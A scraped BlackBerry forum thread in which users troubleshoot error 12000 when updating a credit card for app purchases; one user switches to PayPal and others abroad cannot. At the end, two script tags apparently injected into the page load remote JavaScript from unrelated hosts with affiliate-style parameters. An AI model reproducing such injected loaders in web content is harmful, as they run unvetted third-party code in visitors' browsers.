Welcome!

Welcome to the official BlackBerry Support Community Forums.

This is your resource to discuss support topics with your peers, and learn from each other.

inside custom component

BlackBerry World

Contributor
cupcake2012
My Device: Blackberry Curve 8520

Re: How To Change of Credit Card Information When Purchasing an App?

Hello sdgarne, Michelle,

I was not able to set my new credit card account. I have switched instead to Paypal.

I have tried to purchase an app to test and it worked fine. Am back to app buying! :-)

Kindly try and i hope that it works for you :-)))) :heart:

Contributor
BlindSight
My Device: BlackBerry PlayBook, blackberry z10

I have registered my credit card on my blackberry torch and it was working so good but my credit card had expired and the bank sent me a new one with the same number but with different expiry date when I tried to update to be able to purchase Apps an error appeared 12000 and I have tried all the solutions you said before but without any success my CC is working on the interenet without any problem I also tried a different CC but also the same error

Please I need help in that issue. I bought a new playbook and I Can't download Apps

N.but I live in Egypt

Contributor
cupcake2012

Hello BlindSight,

I have the same issue.

1. Try the links that sdgarne had advised (you can find the Kxxxxxx link from the top of this conversation loop - I have tried them as instructed). If the link instruction still didn't work, you can :

WARNING : This is as per the what I have tried. It had worked for me. (What am trying to say is I just hope it'll work for you as well, to whatever associated errors it might bring in case it won't work, don't be mad at me :-) I pray that it will work for you - crossed-fingers).

2. > FROM CREDIT CARD PAYMENT OPTION, YOU SIMPLY SWITCH TO PAYPAL (If you do not have Paypal account yet, get one by registering to www.paypal.com. There are instructions there to help you through it).

What we did prior switching to Paypal :
1. A techy friend with BB unit too, attempted to change my Blackberry ID with the intent that it will propmt a fresh CC input. It did but after filling it up with fresh info, it still displays the same error 12000.

2. Then he logged and saved his paypal account. It had been successfully saved.

3. I have registered to Paypal. Then I have changed his paypal info into mine and successfully saved.

4. I try purchasing one app to test if it will work and it did! :-))) (very happy again!)

5. I've emailed sdgarne and Michelle that am already A-OK :-)))

Ope it'll work for ya!
Contributor
BlindSight
My Device: BlackBerry PlayBook, blackberry z10

The problem that I live in Egypt and in Egypt the PayPal is not working in my country so I don't have an option except the credit card

Contributor
cupcake2012

Hello BlindSight,

Ow, am sorry to hear that. From the instructions of sdgarne shared link, it had been mentioned there that there might have been an issue with the currency of the CC vs country. I know you have had just a new expiry period but it wouldn't hurt to check (I did that).

If there are no issue with the currency upon your confirmation from your bank, I guess you have to wait for a new post of resolution :-(

Hello Michelle, how did you do? Are you now OK?
New Contributor
smrowe
My Device: 9930

Hi sdgardne.  Thank you for following through with this, but this seems to be a persistent problem.  For those of us who can't use Paypal whle traveling outside the US, is there been an update on the 12000 error problem?  I tried using a VPN back into the US, but that hasn't resolved the issue either :smileysad:

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>